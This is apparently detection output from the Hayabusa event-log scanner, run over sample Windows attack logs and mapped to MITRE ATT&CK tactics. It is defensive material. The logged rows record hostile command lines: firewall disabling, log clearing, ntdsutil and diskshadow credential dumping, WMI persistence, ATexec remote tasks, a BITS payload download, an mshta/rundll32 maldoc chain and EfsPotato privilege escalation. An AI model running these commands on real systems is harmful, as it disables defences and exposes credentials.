2021-06-04 02:42:35.939 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx
2021-06-04 03:34:12.671 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Evas,Windows Firewall Profile Disabled,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
2021-06-04 03:34:12.887 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-NetFirewallProfile): ""Set-NetFirewallProfile"" ParameterBinding(Set-NetFirewallProfile): name=""Name""; value=""Domain, Public, Private"" ParameterBinding(Set-NetFirewallProfile): name=""Enabled""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PolicyStore""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogFileName""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogMaxSizeKilobytes""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""AsJob""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PassThru""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
2021-06-04 03:34:12.888 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
2021-06-04 03:34:12.889 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
2021-06-04 03:34:12.895 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:17:46.489 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a s p state off | Path: C:\Windows\System32\netsh.exe | PID: 0xfa8 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:17:46.577 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall set privateprofile state off | Path: C:\Windows\System32\netsh.exe | PID: 0x10fc | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:17:46.666 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh f s o d | Path: C:\Windows\System32\netsh.exe | PID: 0x1598 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:17:47.699 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh firewall set opmode disable | Path: C:\Windows\System32\netsh.exe | PID: 0x1504 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,../hayabusa-rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,../hayabusa-rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
2021-06-04 18:30:48.170 +09:00,exchange01.offsec.lan,11,info,,File Created,Path: E:\Exchange2016\TransportRoles\Shared\agents.config | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 19108 | PGUID: 6D3C60FE-F13D-60B9-22E2-010000001D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID11-Exchange transport config modified.evtx
2021-06-06 04:35:16.721 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\hacker' q q | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x724 | User: admmig | LID: 0xa8a1627a,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx
2021-06-06 04:36:32.683 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ntdsutil ""activate instance ntds"" ifm ""create full c:\hacker"" quit quit | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x1bec | User: admmig | LID: 0xa8a1627a",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx
2021-06-06 05:17:05.433 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: diskshadow.exe /s shadow.txt | Path: C:\Windows\System32\diskshadow.exe | PID: 0xda8 | User: admmig | LID: 0xa8a1627a,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx
2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,medium,,WMI Event Consumer Activity,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Type: Command Line | Name: ""Evil"" | Dst: ""cmd.exe /c echo %ProcessId% >> c:\\\\temp\\\\log.txt"" | User: OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/20_WmiEventConsumerActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
2021-06-10 23:12:46.042 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx
2021-06-10 23:12:46.058 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"c:\\temp\\log.txt"" -Trigger ProcessStart -ProcessName notepad.exe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx
2021-06-10 23:12:46.157 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""CommandLineEventConsumer"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx
2021-06-10 23:12:46.177 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""__EventFilter"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx
2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4175e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.383 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C whoami > %windir%\Temp\bouWFQYO.tmp 2>&1 \bouWFQYO | User: admmig | LID: 0x5a419bc",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
2021-06-11 06:21:26.383 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C whoami > %windir%\Temp\bouWFQYO.tmp 2>&1 \bouWFQYO | User: admmig | LID: 0x5a419bc",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.390 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /C whoami > C:\Windows\Temp\bouWFQYO.tmp 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x3d0 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp.
arg.).evtx 2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx 2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 
0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx 2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx 2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,info,Evas | Persis,Bits Job Created,Job Title: test | URL: http://192.168.10.254:80/calc.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS 
Jobs/Windows-BitsClient.evtx 2021-08-08 08:32:57.348 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"" /n ""C:\Users\IEUser\Desktop\stats.doc"" | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 3424 | PGUID: 747F3D96-1829-610F-0000-0010A33FD200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | Process: C:\Windows\SysWOW64\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 9932 | PGUID: 747F3D96-182D-610F-0000-00106F40D300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? 
| LID: 0x3e5 | PID: 11196 | PGUID: 747F3D96-182D-610F-0000-00100344D300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" c:\users\public\memViewData.jpg,PluginInit | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | LID: 0x7a857 | PID: 6576 | PGUID: 747F3D96-1834-610F-0000-00105FE5D300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? 
| LID: 0x7a857 | PID: 11324 | PGUID: 747F3D96-183B-610F-0000-0010DC6CD400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx 2021-08-17 21:26:51.403 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx 2021-08-17 21:26:51.457 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx 2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: c:\temp\EfsPotato.exe whoami | Process: C:\temp\EfsPotato.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.844 